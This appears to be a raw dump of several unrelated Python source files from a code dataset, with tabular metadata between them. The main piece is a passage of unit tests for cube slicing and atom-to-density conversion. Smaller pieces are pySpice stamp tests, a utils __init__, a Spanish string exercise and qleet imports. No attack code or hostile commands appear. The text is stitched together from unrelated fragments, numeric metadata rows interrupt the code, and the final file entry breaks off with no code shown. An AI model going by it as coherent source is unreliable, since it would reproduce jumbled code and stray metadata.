def test_transforms_slice(quantum_espresso):
""" see doctests for more specific tests
"""
dct = ejdata_to_dict(quantum_espresso, retrieve_atoms=False)
num_nan_init = np.isnan(dct["elements"][0]["dcube"]).sum()
add_slice(dct, [1, 0, 0], ubound=1)
dct = apply_transforms(dct)
num_nan_final = np.isnan(dct["elements"][0]["dcube"]).sum()
assert num_nan_final > num_nan_init
def test_cubesliceplane_tr_only():
""" test for a plane which only requires translation
"""
ccube = np.array([
[[1., 2., 20.],
[1., 5., 20.],
[1., 8., 20.]],
[[1., 3., 20.],
[1., 6., 20.],
[1., 9., 20.]],
[[1., 4., 20.],
[1., 7., 20.],
[1., 10., 20.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, .5), (0., 0., 1.), cell_size=.25,
alter_bbox=(.0001, 0., .0001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[-0.0, -0.0, 0.5], [1.0, -0.0, 0.5], [-0.0, 1.0, 0.5], [1.0, 1.0, 0.5]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.5, -0.5], [0.5, -0.5], [-0.5, 0.5], [0.5, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.5, -0.5, 2.0], [-0.5, -0.25, 3.5], [-0.5, 0.0, 5.0], [-0.5, 0.25, 6.5],
[-0.25, -0.5, 2.5], [-0.25, -0.25, 4.0], [-0.25, 0.0, 5.5], [-0.25, 0.25, 7.0],
[0.0, -0.5, 3.0], [0.0, -0.25, 4.5], [0.0, 0.0, 6.0], [0.0, 0.25, 7.5],
[0.25, -0.5, 3.5], [0.25, -0.25, 5.0], [0.25, 0.0, 6.5], [0.25, 0.25, 8.0]]
))
def test_cubesliceplane_rot_only():
""" test for a plane which only requires rotation
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (-0.5, 0.5, -0.5, 0.5, -0.5, 0.5)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0., 0., 0.), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[0.5, -0.5, -0.5], [-0.5, 0.5, -0.5], [0.5, -0.5, 0.5], [-0.5, 0.5, 0.5]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_cubesliceplane_tr_and_rot():
""" test for a plane which requires both a translation and rotation
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, .5), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners).round(2),
[[1., 0., 0.], [-0., 1., 0.], [1., 0., 1.], [-0., 1., 1.]])
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_cubesliceplane_tr_and_rot_offset_scentre():
""" test for a plane which requires both a translation and rotation with an scentre which is not in centre of carray
"""
ccube = np.array([
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]],
[[4., 2., 3.],
[1., 2., 3.],
[1., 2., 3.]]])
cbounds = (0., 1., 0., 1., 0., 1.)
corners, corners_xy, gvalues_xy = cubesliceplane(ccube, cbounds, (0.5, 0.5, 0.3), (1., 1., 0.), cell_size=.25,
alter_bbox=(.001, 0., .001, 0.))
np.testing.assert_allclose(np.array(corners_xy).round(2),
[[-0.71, -0.5], [0.71, -0.5], [-0.71, 0.5], [0.71, 0.5]])
np.testing.assert_allclose(np.array(corners).round(2),
[[1., 0., 0.], [-0., 1., 0.], [1., 0., 1.], [-0., 1., 1.]])
nan = np.nan
# print(gvalues_xy.round(2).tolist())
np.testing.assert_allclose(gvalues_xy.round(2), np.array(
[[-0.71, -0.5, 3.99], [-0.71, -0.25, 2.99], [-0.71, 0.0, 2.0], [-0.71, 0.25, 2.5],
[-0.46, -0.5, 2.93], [-0.46, -0.25, 2.47], [-0.46, 0.0, 2.0], [-0.46, 0.25, 2.5],
[-0.21, -0.5, 1.87], [-0.21, -0.25, 1.94], [-0.21, 0.0, 2.0], [-0.21, 0.25, 2.5],
[0.04, -0.5, 1.0], [0.04, -0.25, 1.5], [0.04, 0.0, 2.0], [0.04, 0.25, 2.5],
[0.29, -0.5, 1.0], [0.29, -0.25, 1.5], [0.29, 0.0, 2.0], [0.29, 0.25, 2.5],
[0.54, -0.5, 1.0], [0.54, -0.25, 1.5], [0.54, 0.0, 2.0], [0.54, 0.25, 2.5]]
))
def test_atoms_to_rdensity_central():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.5, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_xoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.75, 0.5, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, 1.0, 1.0, 1.0],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_yoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.75, 0.5]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_zoffset():
atoms = Atoms(symbols=["Fe"], scaled_positions=[[0.5, 0.5, 0.75]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, 1.0, 1.0, 1.0, nan],
[nan, nan, nan, nan, nan]]]
))
def test_atoms_to_rdensity_2atoms():
atoms = Atoms(symbols=["Fe", "S"], scaled_positions=[[0.25, 0.25, 0.25], [0.75, 0.75, 0.75]],
cell=[[1, 0, 0], [0, 1, 0], [0, 0, 1]])
atom_map = {"Fe": {"radius": .5, "color_fill": "red"}, "S": {"radius": .5, "color_fill": "blue"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1, ('S', 'blue'): 2}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [1.0, 0.0, 0.0], 'b': [0.0, 1.0, 0.0], 'c': [0.0, 0.0, 1.0]}
assert dstruct["elements"][0]["centre"] == [0.5, 0.5, 0.5]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0],
[nan, nan, 2.0, 2.0, 2.0]]]
))
def test_atoms_to_rdensity_non_orthogonal():
atoms = ase_bulk("Fe")
atom_map = {"Fe": {"radius": 1.3, "color_fill": "red"}}
dstruct, c_map = atoms_to_rdensity(atoms, cube_dims=(5, 5, 5), atom_map=atom_map)
assert c_map == {('Fe', 'red'): 1}
assert dstruct["elements"][0]["cell_vectors"] == {'a': [-1.435, 1.435, 1.435],
'b': [1.435, -1.435, 1.435],
'c': [1.435, 1.435, -1.435]}
assert dstruct["elements"][0]["centre"] == [0.7175, 0.7175, 0.7175]
nan = np.nan
np.testing.assert_allclose(dstruct["elements"][0]["dcube"], np.array(
[[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[1.0, 1.0, nan, nan, nan],
[1.0, 1.0, 1.0, nan, nan],
[nan, 1.0, 1.0, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]],
[[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan],
[nan, nan, nan, nan, nan]]]
))
| 40.230769
| 120
| 0.468834
| 3,102
| 18,305
| 2.6902
| 0.061896
| 0.359497
| 0.469143
| 0.589575
| 0.845656
| 0.818454
| 0.793289
| 0.782624
| 0.759976
| 0.749311
| 0
| 0.137142
| 0.288555
| 18,305
| 454
| 121
| 40.319383
| 0.503647
| 0.039115
| 0
| 0.770667
| 0
| 0
| 0.041676
| 0.001596
| 0
| 0
| 0
| 0
| 0.12
| 1
| 0.048
| false
| 0
| 0.026667
| 0.002667
| 0.082667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bd7b8d410d6c50fb125b678ee72ceb44dc51cdae
| 3,102
|
py
|
Python
|
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | 5
|
2016-10-17T02:11:45.000Z
|
2020-02-28T20:22:08.000Z
|
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | null | null | null |
test/solver_component_test.py
|
SleepBook/pySpice
|
b1a468820379ce8aeaff91ddfa0113a0accb07f3
|
[
"MIT"
] | null | null | null |
from nose.tools import *
from pySpice.solver.stamp import *
from pySpice.parser.parser import *
import pySpice.global_data
import numpy as np
def test_stamp_resistor():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp1.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('dc', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
assert_equal(sweep_list[0].coord, [((3,),1)])
#assert_equal(RHS,[])
#assert_equal(MNA,[])
assert_equal(converge_flag, 0)
def test_stamp_xcxs():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp2.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('dc', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
assert_equal(sweep_list[0].coord, [((3,),1)])
assert_equal(pySpice.global_data.NODE_TRANSLATION,{'1': 1, '0': 0, '2': 2, 'vin': 3, 'e1': 4})
#assert_equal(MNA, [])
#assert_equal(RHS, [])
def test_stamp_active():
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp3.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim), dtype=np.complex)
RHS = np.zeros((pySpice.global_data.MNA_dim,), dtype=np.complex)
sweep_flag, sweep_list, converge_flag, converge_list = stamp('ac', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(sweep_list[0].switch, 'gen')
#assert_equal(sweep_list[0].coord, [])
assert_equal(sweep_list[1].switch, 'gen')
#assert_equal(sweep_list[1].coord,[])
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim))
RHS = np.zeros((pySpice.global_data.MNA_dim,))
sweep_flag, sweep_list, converge_flag, converge_list = stamp('tran', pySpice.global_data.ANALYSIS_LIST[1], MNA, RHS)
assert_equal(sweep_flag, 1)
assert_equal(pySpice.global_data.NODE_TRANSLATION, {'1': 1, '0': 0, '2': 2, 'vin': 3, 'l1': 4})
assert_equal(len(sweep_list), 3)
assert_equal(sweep_list[0].switch, 'upd')
#assert_equal(sweep_list[0].coord, [])
assert_equal(sweep_list[2].switch, 'upd')
#assert_equal(sweep_list[2].coord,[])
assert_equal(sweep_list[1].switch,'gen')
assert_equal(sweep_list[1].coord, [((3,),1)])
if __name__ == '__main__':
reload(pySpice.global_data)
NETLIST_ROOT = 'data/sample_netlist/'
parser(NETLIST_ROOT + 'stamp3.sp')
MNA = np.zeros((pySpice.global_data.MNA_dim, pySpice.global_data.MNA_dim), dtype=np.complex)
RHS = np.zeros((pySpice.global_data.MNA_dim,), dtype=np.complex)
sweep_flag, sweep_list, converge_flag, converge_list = stamp('ac', pySpice.global_data.ANALYSIS_LIST[0], MNA, RHS)
| 38.296296
| 118
| 0.725016
| 474
| 3,102
| 4.447257
| 0.126582
| 0.166509
| 0.217742
| 0.142315
| 0.883302
| 0.844877
| 0.816888
| 0.816888
| 0.816888
| 0.804554
| 0
| 0.019308
| 0.115087
| 3,102
| 80
| 119
| 38.775
| 0.748634
| 0.073501
| 0
| 0.648148
| 0
| 0
| 0.062096
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.055556
| false
| 0
| 0.092593
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5040218d946bd517ddfa949bb12db23c00e55a3
| 118
|
py
|
Python
|
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
hentt30/EDA-titanic-dataset
|
3213a03b4c0e6569732e19a977be64cf9893def5
|
[
"MIT"
] | null | null | null |
"""
init for utils module
"""
from .trimmed import trimmed_mean
from .trimmed import trimmed_std
from .mad import mad
| 16.857143
| 33
| 0.771186
| 18
| 118
| 4.944444
| 0.555556
| 0.247191
| 0.382022
| 0.539326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152542
| 118
| 6
| 34
| 19.666667
| 0.89
| 0.177966
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
e5120ba18b24994ad061d3c275aeb01172b7a577
| 143
|
py
|
Python
|
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | 1
|
2021-07-16T06:30:37.000Z
|
2021-07-16T06:30:37.000Z
|
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | null | null | null |
vicarui/src/vicarui/analysis/fitting/__init__.py
|
joniumGit/moons
|
f5f8b7e23e707c8cf7e1081c4a1c0fcc22182d85
|
[
"MIT"
] | 1
|
2021-05-26T03:53:41.000Z
|
2021-05-26T03:53:41.000Z
|
from .fitting import DataPacket
from .second_degree import contrast_2nd_deg, integrate_2nd_deg, contrast_error_2nd_deg, integral_error_2nd_deg
| 47.666667
| 110
| 0.888112
| 22
| 143
| 5.272727
| 0.545455
| 0.206897
| 0.189655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.076923
| 143
| 2
| 111
| 71.5
| 0.848485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e557d9d613fc2b7c3de5673478003bd99319e90d
| 379
|
py
|
Python
|
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | null | null | null |
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | null | null | null |
1cac.py
|
Roseliannys17/grupo8_2167
|
19703972ac59f40b6bb4d5c0a7528119e8d94a2d
|
[
"MIT"
] | 1
|
2021-11-22T03:39:57.000Z
|
2021-11-22T03:39:57.000Z
|
#Dado un string, escribir una funcion que cambie todos los espacios por guiones.
string='Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO Hola Mundo hola mundo HOLA MUNDO'
mi_string = string.replace(' ', '-')
print(mi_string)
| 75.8
| 240
| 0.781003
| 63
| 379
| 4.666667
| 0.285714
| 0.642857
| 0.884354
| 1.22449
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0.642857
| 0
| 0
| 0.171504
| 379
| 4
| 241
| 94.75
| 0.936306
| 0.208443
| 0
| 0
| 0
| 0.333333
| 0.786441
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.333333
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e5917ad441193d527d099caa73575710536653e3
| 79
|
py
|
Python
|
qleet/simulators/__init__.py
|
AnimeshSinha1309/qaoa-optimizer
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 9
|
2021-09-26T18:43:43.000Z
|
2022-03-30T12:34:01.000Z
|
qleet/simulators/__init__.py
|
QLemma/qLEET
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 12
|
2021-09-19T13:29:33.000Z
|
2022-01-09T15:22:49.000Z
|
qleet/simulators/__init__.py
|
QLemma/qLEET
|
2a93a46bacc99f22f49e7b5121eb3aa9f12c0163
|
[
"Apache-2.0"
] | 1
|
2022-03-14T03:02:24.000Z
|
2022-03-14T03:02:24.000Z
|
import qleet.simulators.pqc_trainer
import qleet.simulators.circuit_simulators
| 26.333333
| 42
| 0.898734
| 10
| 79
| 6.9
| 0.6
| 0.318841
| 0.608696
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 79
| 2
| 43
| 39.5
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e5a6db18be790ecc1a424104eb91698be76ddabf
| 166
|
py
|
Python
|
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | null | null | null |
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | null | null | null |
Core/Exceptions/Search.py
|
hanif-ali/BlogBar
|
e24aa0835ac8869680bd904ad050fd7437ed97c7
|
[
"PostgreSQL"
] | 1
|
2020-10-25T18:11:22.000Z
|
